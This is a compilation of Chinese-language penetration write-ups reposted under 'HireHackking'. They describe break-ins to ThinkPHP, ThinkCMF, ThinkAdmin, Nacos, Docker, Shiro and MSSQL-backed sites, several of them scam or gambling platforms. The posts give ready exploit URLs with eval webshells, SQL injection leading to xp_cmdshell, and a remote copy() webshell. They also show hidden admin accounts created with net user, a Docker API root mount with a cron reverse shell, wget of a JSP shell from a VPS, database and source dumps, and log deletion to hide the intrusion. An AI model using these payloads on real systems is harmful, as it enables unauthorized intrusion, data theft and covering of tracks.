http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=phpinfo&vars[0]=1    //执行phpinfo
eaytfpyagqt12697.png

成功弹出phpinfo,ThinkPHP的RCE漏洞没有修复,并且通过phpinfo可以看出服务器使用宝塔搭建,运行Windows系统,本想着接下来的事情就非常简单了,但是当我写Shell时遇到了困难:
http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=ye.php&vars[1][]=<?php
 eval($_POST['cmd']);?>

文件被成功写入,但是却直接输出在了页面中,查看源代码发现< >被转义为了HTML实体编码:
g52s401kwhd12698.png

在尝试利用base64编码后再写入,发现依然被转义,直接命令执行试一试:
http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

发现并没有出现回显,尝试反弹Shell也无功而返,这个时候感觉到system可能被禁用了,改用eval依旧无果,最后使用assert发现可以成功执行,直接构造Shell连接:
http://www.hu*****.***/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_POST[ye])

得到Shell后先尝试执行命令,但是命令依旧无法正常执行,尝试突破disables_function但失败了

这个时候思路转换一下,查看ThinkPHP框架的服务器配置文件/application/database.php得到MySQL数据库账户
ik5xgfnai3212699.png

连接数据库:
3od3knt3izt12700.png

查询后台管理员数据:
ugf2hwraevm12701.png

却发现md5无法解开,但是大致查看了数据库中的数据,到这里并没有发现什么有较大帮助的数据,因而并没有考虑继续死磕在后台账户上

接下来的主要重心应放在对于该站点管理员的信息收集上,先查看一下ThinkPHP框架中的日志记录文件/runtime/log/202107/05.log

在日志中发现system函数果然被禁用了:
gzblmbpf2ou12702.png

与此同时也在日志中发现了一条刚才检查数据库时忽略掉的重要数据——后台管理员最后登陆IP:
hlpvynlvfnt12703.png

翻阅前几日记录发现最后登陆IP都是101.78.*.*这个IP地址,怀疑这就是网站管理员IP地址,反馈给学长后查询了一下该IP,发现是香港的IP,心里一慌:这应该是挂了V P N了吧

结果不出所料:
2jrrm0gb2go12704.png

接下来的工作陷入了僵局,翻阅ThinkPHP的日志后并没有发现其他IP的登陆数据,修改数据库中后台管理员账户密码,登录后台后也没有发现任何有用的信息,只有一些钓鱼文章的管理:
mjksnkmzxph12705.png

后来和一个大师傅交流了一下,大师傅建议查一下看宝塔中有没有留下有用信息,在C:/BtSoft/panel/data/default.db中找到了宝塔面板的数据文件,获取到宝塔的账户信息:
v0mgm1njuo312706.png

同时也查阅了一下宝塔数据库中的log日志内容:
jxd4v0bz1up12707.png

但是却无法解出密码,这时可以通过覆盖db文件重新设置账户密码,但该方法需要重启面板,受限于我们目前的情况,这个办法很难实现

于是思路再次陷入了僵局中,睡了一觉第二天醒来想起宝塔面板会有请求记录日志,于是在C:/BtSoft/panel/logs/request/ 中找到了大量以json形式储存的请求信息
0osczykos4212708.png

打开时间较早的日志文件,果然有所突破(有可能是V P N不稳定,在操作时突然挂掉了,导致真实IP的泄漏):
00kiuvmtich12709.png

在查询175.167.*.* 后,发现是辽宁沈阳的IP地址,用网上的工具进行大致定位反馈给学长

顺带将网站的源码、数据库、log日志文件进行打包取证,一并收集起来,最后再删掉我们在渗透时留下的请求记录
jhvrc502kk212710.png

完事收工


转载于原文链接: https://www.cnblogs.com/yesec/p/14983903.html

		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
我们找到一个带有有漏洞的QP后台框架的后台
图片
这个框架有很多的漏洞,比如用户遍历,我们如果输入一个存在的用户,密码错误时,就会提示用户或密码错误,如果我们输入一个不存在的用户,就会提示用户不存在
除此之外,网站还会存在SQL注入漏洞,我们只需要抓一个提交账号密码的POST包
图片
粘贴好一个txt文档然后丢进sqlmap,
图片
是mssql,我们可以开启xp_cmdshell,这里我们打算写入webshell,所以先os-shell判断出路径(超级慢)
图片
然后利用xp_cmdshell写入webshell
图片成功上线
然后我打算上线cs进行下一步操作,尝试了web传递,但是被杀软拦住了
图片
很烦,没办法,只能尝试免杀上线,这里我用的免杀方法是分离免杀
图片
生成payload,然后写一个shellloader并且base64编译一下
我把shellcode放到了vps上
图片
把shellloader上传到目标
图片
一,二,三上线!
图片
没错,低权用户,多次尝试提权都不成功,最后还是sweetpotato拿下了
图片

拿到了我最爱的system
添加用户
net user admin$ admin@123 /add
添加到管理员组
net localgroup administrators test /add
直接3389连接
图片
拿到远程桌面本来打算fscan扫一下的,但是发现内网的ip和平常不一样,扫了一下发现出现很多主机,于是判断这是一个vps,故渗透到此为止。


转载于原文链接: https://mp.weixin.qq.com/s/ch3zcIlUPpZ8tjCJttwarQ


		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
在一个风和日丽的晚上,正兴奋逛Twitter的我,忽然发现下面推荐关注有这么一个xxxx视频的名片。
图片
这这这这,我可是正经人,不知道Twitter为啥会给我推送这些。这必须盘他,打开推广链接,辣眼睛,下载该app。
图片
这app一打开就给人一股熟悉的味道,一看感觉很有可能是tp二开的。
图片
注册手机号fiddler抓包改包,其实内容更辣眼睛
图片

抓包获取url发现这不就是thinkcmf吗?满脸淫笑的想这还不拿下,前台那么多rce,就算有狗也能秒之,然而很快被现实打脸。
命令执行POC:
payload1:
/index.php?g=api&m=Oauth&a=fetch&content=<php>file_put_contents('pass.php','<?php @eval($_POST[1]); ?>')</php>
图片
payload2:
/?a=fetch&;templateFile=public/index&prefix=''&content=<php>file_put_contents('pass.php','<?php  @eval($_POST[1]); ?>')</php>
图片

payload3:
?a=display&templateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22])%3b%3F%3E%27);die();?%3E
然后任意文件读取:
/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log
最后在目录下会生成一个m.php一句话木马文件,当然也可以写成其他的payload。
图片
一顿操作猛如虎,一看文件404,难道就要凉凉了?
图片
不怕,另外该APP,还有SQL注入:
注入点1:
/index.php?g=Appapi&m=Video&videoid=1
图片
注入点2:
/index.php?g=Appapi&m=Auth&a=index&uid=128889&token=b69cda34dff2fa978a94b5583e7f5c9a
图片
图片
注入也凉凉,看来我这是要我掏出0day的节奏?算了还是忍忍吧。经过一番鼓捣研究,细节就不贴了,此处省略千字。说多了都是泪........
最后终于出了phpinfo,版本7.2以上
payload:
/?a=fetch&content=<?=phpinfo();exit();
这不离shell更近一步了,然后看disable_functions禁用这么求多。
图片
这里尝试了使用assert函数写入,以为成了,结果还是返回1
图片
@assert函数不行,这里就可以尝试读取文件file_get_contents,读取数据库配置文件
图片
在继续读取config.php文件时,突然想起之前下载app的时候是放在阿里云oss里面的,按理说他的配置文件里面应该有阿里云key和id,但现实终究是那么残酷,连aliyun这几个字母都没看到。
图片
读取一些配置文件没有东西,数据库和redis不可外连,于是就准备写个shell上去在仔细翻下,尝试用file_put_contents读取文件。
图片

好像不行,难道是参数问题,file_get_contents都能读任意文件,或者是目录不可写?尝试写在/tmp/1.txt也是同样的报错,想到php还要其他写文件的函数,于是w3school翻了下
图片
写入123到i.txt,成功写入文件
图片
图片
尝试写入php一句话,提示模板不存在,该怎么办?眼看shell到手了。仔细看fwrite参数 ,w+是打开写入,r+是追加,难道我要一个字符一个字符写入?没错,就是要一个字符一个字符写入。
?a=fetch&content=%3C?=@$fp=fopen(%221.php%22,%27a+%27);%20fwrite($fp,%27<%27);exit();

图片

最终可getshell
图片
绕过命令执行,反弹shell
图片
然后打包+脱裤
 mysqldump -h127.0.0.1 -uxxxx -pxxxx xxx >xxx.sql
tar -cvf 1.tar /www/wwwroot/xxx/
图片
以为这就完了 ?no,看了端口链接以及登陆ip还有搞头,后续待我钓到管理员pc,出续集,另外cmf密码默认加密
<?php
function setPass($pass)
{        
    $authcode = 'rCt52pF2cnnKNB3Hkp';
    $pass = "###" . md5(md5($authcode . $pass));
    return $pass;
}
echo setPass('123456')
?>
进后台的话,明文加密替管理员密文,或者加密明文去撞。

转载于原文链接: https://mp.weixin.qq.com/s/1gI8LC_FBFWG_ar3j1dZJw


		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
一、目录结构
    首先我们先看一下结构,system文件夹下有相关代码。我直接给大家看一下漏洞吧。
图片
二、审计出洞
1、购物车异步获取信息 - SQL注入
system\modules\member\cart.action.php
图片
  虽然本身是过滤单引号但是在这里并没有用单引号保护起来所以这里是一个注入,并且没有验证用户身份,从站外未登陆的情况下即可进行注入。
图片
图片
直接官网哈哈哈哈!!!!
2、BOM插件 - 目录遍历
system/plugin/bom/bom.plugin.php 
图片
 直接访问即可,后台即便是改了也没什么事情,照样刚!
图片

3、我的晒单 - 存储型XSS(可打到管理员Cookie)
 由于这套CMS出来的较早了,在此之前被许多小黑挖掘过XSS漏洞,但是....我这个XSS貌似也是0day 哈哈哈需要晒单功能这里给大家演示一下先走一遍流程
图片

添加晒图
图片

把图片地址改成我们的XSS语句
图片

fileurl_tmp参数
图片

这时候便把IMG标签闭合了弹出了1 (触发在后台管理的“晒单查看”)
图片

4、上传配置 - 后台Getshell
 可能有些人看到后台有上传的地方,其实这些个上传是没有办法利用的。虽然你可以在后台改格式白名单但是依旧提不下。这时候呢....插马呗!!~~
图片
由于他过滤单引号所以这里就不带上单引号了。
图片
允许上传类型处,写上pyload
图片
提交完就完事了~~ 通过copy函数远程写个马就完事了
图片
5、后台验证码存在缺陷
图片
 默认账户admin 这一串MD5值就是对应的验证码的值,此处可以调用接口进行爆破。也是个小小的缺陷吧

6、组合拳Getshell - CSRF+XSS
  我们直接用XSS嵌套一个html页面,然后模拟所有的操作就完事了从修改upload格式插马开始到模拟访问
[/index.php/admin/setting/upload?c=copy("http://www.xxx.com/shell.txt","../inc.php");
 直接一些列打过去就完事儿了实在不放心就在最后模拟添加一个管理员就阔以了。

这套CMS并没有过滤CSRF攻击,我也不截图了各位表哥的姿势比我骚,哇嘎嘎嘎嘎嘎嘎....需要源码可以跟我说一下(好累喔) 

转载于原文链接: https://mp.weixin.qq.com/s/8OTU9yQ3pxj6k2QpbEzNRA



		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
前言
昨天半夜看到一篇文章 某菠菜网站渗透实战
就想着自己也练一练手,打到一半发现,大师傅们对这类站点已经狠狠的蹂躏了,所以借鉴师傅们的经验,本着锻炼一下,想到哪就记一下,所以写的比较杂乱,其中有没有解决的地方也记录下来的,然后又换了个站点接着走了下去
信息收集
前台这样
Image
看一下其他的信息
Image端口查询
Image80为主页面 81 82 为后台登录界面 1433 mssql
Image目录扫描
Image存在目录遍历
Image
漏洞发掘
先去后台页面
输入用户名:123提示用户不存在
输入用户名:admin提示用户或密码不正确
确认admin账号,且没有验证码验证,可尝试爆破
直接弱密码 admin 123456 进入后台
Image功能不多,利用点也没什么
重新回到登录处进行sql注入
ImageImagemssql,dba权限,直接–os-shell
Image这里第一台机器不出网且没回显,放弃了,找了几个站终于找到一个出网且回显的网站(只要出网就挺好解决的)
Image
Image
CS上线
这里尝试CS,判断出网直接生成powershell上线
ImageImageImage看一下信息,查一下tasklist
Image目前是数据库权限,尝试提权,结果直接打掉线,网站也打不开了,还是要慎用,做足信息收集,做足补丁信息的收集
Image又换了一个站点:找到网站路径
Image先拿个webshell
Image哥斯拉顺手甜土豆提权为 system
ImageCS插件甜土豆也提权成功
Image
抓一下管理员密码
logonpasswords
付费的
Image加个影子账户,管理员权限
Image
公网CS通过frp转到内网MSF
先上文章吧 FRP+CS实现本地Kali收Shell
服务端(这里为5000,改完忘截图了)
Image客户端
ImageMSF开启监听
ImageCS
Image
后续
看能不能通过窃取Token以管理员身份登录
getuid //查看当前token
use incognito //加载incognito
list_tokens -u //列出accesstoken
impersonate_token “xxxxxxx\administrator” //模拟管理员用户
rev2self //返回之前的accesstoken权限
Image假冒一下令牌
Image但是进入shell的时候不是管理员身份,以system身份查找当前进程,迁移到管理员的进程中
再进入shell
ImageImage然后我还是想 RDP上去但是又没有密码,想到之前看过的一篇文章进行RDP会话劫持:
内网渗透 | RDP会话劫持实现未授权登录
内网漫游:通过RDP劫持向远程系统执行任意代码
最后时间太晚了,就又换了一个站点,成功抓取到密码
ImageRDP直接上去
Image

转载于原文链接: https://mp.weixin.qq.com/s/isk1bmYOuR_79QOBDlwFZQ?ref=www.ctfiot.com

		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
0x00 前言
去年逛微步,本来是想找几个ip练练溯源能力,无意间发现了一个杀猪盘。本文打马赛克如果有漏的地方请及时指出,也请各位不要去微步上边找我这个目标复现,本case已全权交由某官方处理。
0x01 简单的打点
Image
打开链接一看,一股子浓浓的“微盘”气息扑面而来,由于我们自己审计过这套源码,所以就直接找对应的地方打了个xss,结果呢他这竟然是微盘三开,没错,三开!
无奈之下还是用老思路,想办法让框架报错,看版本号,走一遍rce。
Image
得到版本号和物理路径,其实还有个小细节,可以看下图。
Image
这里有个SERVER_NAME和SERVER_ADDR,之前打同类项目的时候遇到过一个情况,通过让页面报错反馈出来的这俩信息里可能会带着真实ip,如果在找不到目标真实ip的情况下可以试试这个小技巧。
大家都知道,这种目标,其他的旁站,端口什么的收集都没啥卵用,所以我也不赘述了。
注册个账号上去看了看,也没啥能利用的点,这时候呢突然想起了goods/pid这里有一处注入,由于之前都是用我们自己的day打,所以从来没用过这个注入点,这不今天就来试了试。
Image
bingo!这就很奈斯了,知道物理路径那不就可以传shell了?不,并不可以,权限不够。
但是你看我发现了啥呢!
Image
database的信息莫名其妙显示出来了,这不就可以直接连了??显然是不可以的,因为没法外连。。。。。
0x02 直冲云霄了属于是
大概僵持了十分钟,你看看我发现了啥。
Image
adminer哈哈哈,这是咋发现的呢,之前提到过这套系统的一开,二开我们都审计过,在某些特定目录会有这么一个adminer数据库管理系统,所以我就也从本次目标上fuzzing了一下,这不就找到,然后连接上了。
找到嫌疑ip,简单的查查真实性,定定位啥的。
Image
果不其然,又在我们的大云南。
为了确保证据的完整性,我们还是得想办法去后台截个图啥的。因为现在是在库里嘛,所以就可以直接把盲打xss没成功的地方强制改成了xss的payload,然后诱导客服去触发就好了。
Image
Image
Image
然后就进来咯,后台的上传点在三开版本也给删了,数据库里拿shell权限不够,也开启不了所需的服务,所以最终也没能拿下shell。


转载于原文链接: https://mp.weixin.qq.com/s?__biz=Mzg4MjcxMTAwMQ==&mid=2247486198&idx=1&sn=e41bc5d7e4aee7314beaab7f5830435d&chksm=cf53ca40f8244356493dff79a82e26a8c3ef89c50c4508de61cacf523527534d383e6d6b2445&scene=178&cur_album_id=2831511688645656580#rd

		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
0x01 thinkadmin历史漏洞复习
已经找到对方的app的后台地址是thinkadmin,因此我们需要去复习thinkadmin的历史漏洞。
CVE-2020-25540
https://github.com/zoujingli/ThinkAdmin/issues/244
利用POC如下
https://github.com/Schira4396/CVE-2020-25540
列目录
POST /?s=admin/api.Update/node
rules=["runtime/"]
文件读取
/?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b363932382x312t1b
其本质大概想设计出来一个能让第三方去对比服务器上的系统web文件的功能,结果因为目录穿越造成任意目录读取。虽然有一定限制,但危害还是非常非常大,因此后续更新直接将这个功能下架。
还有一个没有CVE的反序列化漏洞
https://github.com/zoujingli/ThinkAdmin/issues/238
存在两处接口,其中一处正是上面列目录功能的rules传参。
POST /?s=admin/api.Update/node
rules=payload
另外一处则是
POST /?s=wechat/api.Push/index
receive=payload

0x02  第一份源码
因为官方已经不提供旧版源码下载,所以我第一时间去其他地方找到了一份使用thinkphp5.1.38的旧版源码。检测了下,其有如下漏洞。
application/wechat/controller/api/Push.php
两处反序列化只修复了一处。
图片
application/admin/controller/api/Update.php
列目录和任意文件读取的路由稍微变了一下,而且列目录无法用rules传参进行控制,只能列web根目录。但任意文件读取取消了各种限制,这意味着可以直接读config/database.php获取数据库配置。
图片
获取了数据库配置之后,数据库如果能够外连就可以深入一点利用。
application/admin/controller/api/Plugs.php
图片
这个是thinkadmin自带的文件上传接口,正如很多cms设计的一样,其白名单storage_local_exts在数据库或者系统后台中都能进行配置。正常来说,我们可以利用这个进行getshell操作,但很明显,如果直接给白名单加上php,过不去第四个if,且后台的系统配置中也有拦截。
application/admin/controller/Config.php
图片
我们如果直接操作数据库,可以绕过后台配置限制,但绕不过upload()的限制。
很显然,只过滤php是不够的,如果对方是windows服务器,我们还有php::$DATA可选,如果对方是apache且进行了错误的配置,我们还有php3/php4/php5/php7/pht/phtml/phar这些可能的解析后缀。
0x03  第二份源码

然而第一份源码除了熟悉thinkadmin架构之外没有任何卵用。因为目标是thinkphp6.0.3的,而且漏洞也和第一份不一样,不存在反序列化。不过还是存在列目录和文件读取,而且和历史漏洞一模一样。
app/admin/controller/api/Update.php
图片
但是在列目录时,碰到了一个问题。
图片
这是因为我列的是web根目录,如果对方项目巨大,或者某个文件夹没有权限,就会导致报错,这个时候就需要针对性列目录,以./app./runtime为主。
图片
图片
读./app可以获取controller路径,在原版thinkadmin中,突破口并不多,但这种程序很多都是二开的,对比原版thinkadmin那些没有的controller,就可能直接审计出漏洞。审计漏洞需要配合任意文件读取,具体该怎么读请回顾前面的。总而言之,有了CVE-2020-25540我们等于获取了其源码。
这个程序就很容易发现一个SQL注入。
/app/admin/controller/api/Main.php
图片
图片
然而等我吭呲吭呲的注出密码后却发现,登录需要OTP验证,没办法,继续审计。

/app/admin/controller/Posting.php
图片
非常愚蠢的命令拼接,同位置有三处,但都需要后台权限,而且最后发现exec()disable_functions了,所以无法利用。
/app/admin/controller/api/Upload.php
图片
最后一处是在朋友的提醒下发现的,这乍一看不就是thinkadmin自带的上传吗?前面分析过需要特定环境才能利用,所以我就直接跳过了。结果居然多了个xkey传参可以完全控制$this->name,很难不让人怀疑这是个后门。最后getshell是这样的。
图片
但这个上传接口也需要后台权限,怎么办呢?这个时候就轮到thinkphp经常用到的./runtime出场了。
读runtime/admin/log/single_error.log这个文件很容易发现它记录了一系列的session报错。
图片
而且我们可以知道,这套程序用的php原版session,而且没有放在/tmp或者/var/lib/php/sessions/中,而是runtime/session。那就简单了,我们直接利用列目录列出所有session,然后进行爆破。
图片
这样就可以直接进入后台绕过了OTP限制,接下来再用它的xkey后门getshell就行了。
图片
0x04  另类脑洞

万一没有后门怎么办呢?这套系统是linux+nginx,无法绕过thinkadmin原版upload限制。
但在后续代码审计中,我发现了其有个图床服务器。
图片
这台被getshell的服务器(A),可以带file_paths参数访问图床服务器(B)的一个接口,其目的是为了让服务器B反过来下载服务器A上面的图片备份下来。为什么我会知道这点呢?
因为服务器B更加千疮百孔,直接访问这个接口就会发现。
图片
不但因为debug泄露了源码,而且这个命令拼接也太赤裸裸了,甚至可以直接当shell用。
图片
所以我们完全可以在不拿下服务器A的情况下,通过任意文件读取和代码审计直接拿下服务器B。
拿下服务器B又有什么用呢?服务器A是会用curl请求服务器B的,这种情况下,可以篡改服务器B的代码,将接口改成302跳转,然后修改协议为gopher,就可以打到服务器A的本地端口了。
如果服务器A的本地存在fpm的9000端口,以及redis的6379端口,就可以这样曲折的进行SSRF getshell,这种案例在discuz的SSRF漏洞上经常能得到利用。

这次虽然没9000 fpm,但却有redis,redis密钥和端口也在config/cache.php存储着,而且web目录恰好是777权限,完全符合gopher打本地redis的条件。

当然,最终我并没有进行尝试,但理论上完全没有问题。

转载于原文链接: https://mp.weixin.qq.com/s/BuHJuQh3lyaq1SmY2xKl3g


		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			 

1、供应链


在经历了多年的攻防对抗之后,大量目标单位逐渐认识到安全防护的重要性。因此,他们已采取措施尽可能收敛资产暴露面,并加倍部署各种安全设备。但安全防护注重全面性,具有明显的短板效应,一处出现短板,整个防护体系就可能瞬间崩溃。而目标单位的供应链往往是这些薄弱点的集中体现。这些供应链不仅暴露在外,而且由于复杂的关系,使得对它们的监控和管理变得更为困难。因此,攻击团队通常会选择从供应链着手,以一种迂回的方式绕过目标单位强大的防御体系,获得对目标单位的控制权限。


通过在搜索引擎上搜索"系统名称"目标单位


image.png

找到相关的供应商信息,通过对供应商进行攻击,获取目标单位的数据及权限。!


image.png


1.1、heapdump泄露


通过对供应商资产进行渗透,发现某资产admin目录下存在heapdump文件泄露


image.png


对于heapdump的利用方式这里就不太赘述,有许多文章对其原理和利用都进行了深入的研究,特定情况下还可以直接进行RCE,这里泄露了大量敏感信息,密码信息加入密码本


image.png


登录MinIO,发现大量所属目标单位的敏感信息,也存在其它单位的敏感信息


image.png


登录Nacos,大量配置文件,密码信息加入密码本![]


image.png

登录OSS,发现大量所属目标单位的敏感信息


image.png


1.2、微信小程序接口未授权


1.2.1、微信小程序解包


想要对微信小程序进行解包操作,首先是要获取目标小程序的wxapkg文件。wxapkg文件是微信小程序的安装包文件格式,用于将小程序的代码、资源以及其他必要的文件打包成一个单独的文件。但是Windows环境下的wxapkg文件中的js代码和资源文件一般是被加密的,需要使用专门设计的解密工具先进行解密,再进行解包操作,获取文件内容。iOS和Android平台下可直接进行解包操作。


1.2.1.1、获取wxapkg文件


在获取wxapkg文件时,最好将文件夹中的文件先删除,然后再重新打开小程序,防止其它文件干扰


iOS wxapkg 文件存放路径为:


/var/mobile/Containers/Data/Application/{系统UUID}/Library/WechatPrivate/{user哈希值}/WeApp/LocalCache/release/{小程序的AppID}



Android wxapkg 文件存放路径为:


/data/data/com.tencent.mm/MicroMsg/{user哈希值}/appbrand/pkg/



Windows wxapkg 文件存放路径为:


C:\Users\{系统用户名}\Documents\WeChat Files\Applet\{小程序的AppID}\



image.png


1.2.1.2、解密操作


下面两个github项目都可以进行解密操作


https://github.com/superdashu/pc_wxapkg_decrypt_python
https://github.com/BlackTrace/pc_wxapkg_decrypt


解密原理


image.png

成功解密


image.png


1.2.1.2、解包操作


国光大佬提供的工具下载链接


https://sqlsec.lanzoub.com/i1NEP0mx694f


node wuWxapkg.js 1.wxapkg



image.png


对小程序进行解包操作,获取到前端JS代码后中,从中进行提取获得接口


image.png


直接访问目标接口,前端页面虽然显示初始化失败


image.png

但流量包中已获取数据,近千万条目标单位敏感信息


image.png


1.3、web程序越权


通过上述收集到的密码,撞密码撞出一个账号,但是此账号为最低权限,无任何操作权限,点击搜索组织架构,此时无任何返回信息
image.png


抓包将parentId和orgLevel去除,再发包,即可越权看到全员组织架构


image.png


点击修改密码,然后将上述获取到的roleId添加进去,即可获取全部权限


image.png


获取到大量数据


image.png


1.4、公众号


js泄露密码,密码可撞库目标单位公众号


image.png


2、云原生安全


容器化部署和微服务架构为应用程序开发和部署提供了更好的灵活性、可伸缩性、可维护性和性能,受到了越来越多厂商的使用,新的应用就会引入新的攻击面,如容器逃逸、服务间攻击、API滥用等。攻击者可以利用这些新的入口点来攻击应用程序和数据。并且在云原生环境下管理用户和服务的身份验证和授权变得更加复杂。许多应用开发商在追求容器化和云原生架构的便利性和效率时,安全性常常被忽视或放在次要位置。这就直接导致了云原生环境的脆弱,容易受到各种安全威胁和攻击。


2.1、Harbor 镜像仓库


Harbor是一个开源的容器镜像仓库管理器,旨在帮助组织存储、管理和分发Docker容器镜像,但是Harbor存在一个充满争议的“漏洞”:任意用户能够直接获取public的镜像。


image.png


可以直接拉取下载镜像文件,可以利用脚本批量下载


image.png


2.2、疑似后门


通过镜像文件获取jar包,获取配置文件等敏感信息,对jar包的class文件进行反编译,进行代码审计获取到一个类似后门的漏洞,该接口只需要使用用户名,即可登录系统后台。管理员权限配合文件上传获取服务器权限。


image.png


通过配置文件连接数据库等


image.png


2.3、docker未授权


2.3.1、 registry api未授权访问


在 Docker Registry API 中,认证和授权通常是基于访问令牌(Access Token)或者用户名和密码的。如果未正确设置访问控制权限,即会造成未授权访问漏洞,攻击者可直接下载registry仓库的所有镜像容器。


访问/v2/_catalog接口即可查看全部仓库内容


image.png
https://github.com/Soufaker/docker_v2_catalog


利用上述工具可直接下载镜像


2.3.2、 Docker Remote API未授权访问


为了管理容器集群,Docker允许Daemon作为后台守护进程执行通过管理接口发送的Docker命令,使用参数-H
 0.0.0.0:2375启动Docker 
Daemon时,将开放2375端口接收来自远程Docker客户端的命令。在这种情况下,2375端口被作为非加密端口暴露出来,并且不存在任何形式的身份验证,攻击者可以直接使用Docker命令连接到Docker
 Daemon,并对容器进行直接操作,配合根目录挂载即可实现容器逃逸。


#查看容器
docker -H tcp://<target>:2375 ps -a



image.png


#挂载宿主机的根目录到容器内的mnt目录
docker -H tcp://<target>:2375 run -it -v /:/mnt nginx:latest /bin/bash
#反弹shell
echo '反弹shell命令' >> /mnt/var/spool/cron/crontabs/root



2.4、Nacos


Nacos是一个开源的动态服务发现、配置管理和服务管理平台,它提供了注册中心、配置中心和服务管理等功能,帮助开发人员实现微服务架构中的服务注册、配置管理以及服务发现等需求。


作为一个开源工具,漏洞还是被披露不少的,


未授权访问:/nacos/v1/auth/users?pageNo=1&pageSize=1 直接查看用户


任意用户添加:POST /nacos/v1/auth/users username= & password=


任意用户密码修改:curl -X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken\=' -H 'User-Agent:Nacos-Server' -d 'username\=test1&newPassword\=test2'


弱口令:nacos/nacos


image.png


通过编排密码爆破进后台,发现大量配置文件,但敏感信息均被加密


image.png


2.4.1、Jasypt加密


Spring 的配置文件中会有一些敏感信息,如数据库密码,因此有时我们希望将敏感信息加密,Jasypt 就是其中比较方便的工具,Jasypt 是一个 Java 库,用于简化敏感数据(如密码、API 密钥等)的加密和解密操作。


加密的内容需要用 ENC(..) 括起来,加密用的密码通过 jasypt.encryptor.password 指定。


spring:
  datasource:
    username: your-username
    password: ENC(encrypted-password)



因为必须要解密,密码就需要放在配置文件里,或者放在代码中:


# application.yml

jasypt:
  encryption:
    password: 密码
    algorithm: 加密方式



解密数据:使用解密器的 decrypt 方法对加密的数据进行解密操作。


import org.jasypt.util.text.BasicTextEncryptor;

public class DecryptionExample {
    public static void main(String[] args) {
        String encryptionKey = "yourEncryptionKey"; // 加密密钥
        BasicTextEncryptor textEncryptor = new BasicTextEncryptor();
        textEncryptor.setPassword(encryptionKey);

        String encryptedText = "encryptedText"; // 加密后的数据
        String decryptedText = textEncryptor.decrypt(encryptedText);

        System.out.println("Decrypted Text: " + decryptedText);
    }
}



但是客户端加密的安全性主要依赖于客户端代码的保护和可信任性,当密码泄露后,加密也就自然失效了,在ncaos一个文件中发现jasypt加密密码,可以直接进行解密操作


image.png

成功连接OSS


image.png


成功连接数据库


image.png


小程序token,接管小程序


image.png


达梦数据库是国产化的关系型数据库,使用下面工具可以进行连接


https://github.com/864381832/x-RdbmsSyncTool/releases/tag/v0.0.3


3、Nday


3.1、yongyouNC jsInvoke rce漏洞


漏洞利用方法,通过Java反射机制创建一个javax.naming.InitialContext对象,并使用LDAP协议连接到指定的IP地址和端口,然后调用"nc.itf.iufo.IBaseSPService"服务中的"saveXStreamConfig"方法,接受对象和字符串作为参数,达到命令执行的效果。


命令执行成功,但是目标系统存在杀软,无法直接上传文件


image.png


3.1.1、certutil


certutil 是 Windows 操作系统中的一个命令行工具,主要用于处理证书和加密相关的操作,利用 certutil的解密操作可以绕过杀软。


echo bash64编码后的免杀马 > myfile.jsp



image.png


使用certutil进行解码


certutil -decode 木马相对路径 解码后的木马相对路径



image.png


冰蝎上线并上线CS


image.png


3.2、若依二开


shiro的洞修复了,找到一个前台信息泄露漏洞


image.png


通过获取到的用户名,使用弱口令进入后台,普通权限


image.png


再次对公告发布人员猜解密码,成功登录后台,多了系统管理权限,直接添加用户赋予最高权限


image.png


新增用户登录,发现定时任务功能,直接使用定时任务执行命令


image.png


3.3、shiro


目标路径在被访问时,会先跳转到统一认证登录,导致大部分都忽视了该路径是存在shiro反序列化漏洞的


image.png


本着试一试的心态进行了shiro的扫描,默认密钥,直接获取权限


image.png

 
转自于原文链接: https://forum.butian.net/share/2442

 

		

		
		

			

		

	
	


		
			



	

		

			


	
		HireHackking
	

			
		

	

	

		

			
0x00 前言
2022.8.X单位突然通知参与某行业专项攻防演练,本着学习的目的参与了一波,特此记录。
0x01 打点
获得目标单位名称
先通过爱企查、天眼查等工具查询目标及目标下属单位信息
可以利用工具:ENEScan_GO
接着就是信息收集三板斧
子域名、IP、端口
收集子域名:OneForAll(API要配置全一点)、Subfinder、FOFA、Hunter
收集IP:Eeyes、domain2ip
端口扫描:Goby、Nmap、Masscan
这里使用的是Goby全端口扫描,扫描速度堪忧,但优点是比较全面且展示效果较好。
端口扫描后筛出Web类与非Web类端口,便于精确打击。
Web类可以先统一进行指纹识别,优先攻击一些重点的框架系统 比如(Shiro、通达OA、用友NC等)
非web类可以筛出来进行服务爆破,一些特殊的端口可以优先摸一下试试,比如6379 Redis
0x02 获取突破口
一番操作之后,通过以上打点,得到了一个Shiro框架的系统,这个系统是访问路径后默认跳转到SSO平台进行登录的。想进入该系统,入口必须是走SSO平台登录验证后进入。但是经过手工口令测试,发现通过弱口令进SSO系统有点困难,战略性放弃。
先利用Shiro反序列化工具查看是否存在RCE漏洞。
image-20220825152609345.png
这边给个建议,不同工具可能不一定能抛出Key和利用链,大家在进行测试的时候,手里尽量多换几个工具来测试,我这里换了三个工具才跑出Key和利用链,其他的工具就是跑不出(不是Key字典的问题,就是单纯跑不出。。。)
image-20220825154032692.png
image-20220825154317117.png
Linux机子,whoami Root权限,ping www.baidu.com 出网。
先用linux语句 根据网站的静态文件名称找一下目录地址
find / -name 404.jsp
image-20220825154413821.png
直接到能访问的网站根目录下 wget我VPS上的JSP马,接着蚁剑连接。
image-20220825155446999.png
翻了一下/webapps下,发现是3个系统+SSO系统
猜测只要经过SSO验证就可以访问其他的3个系统
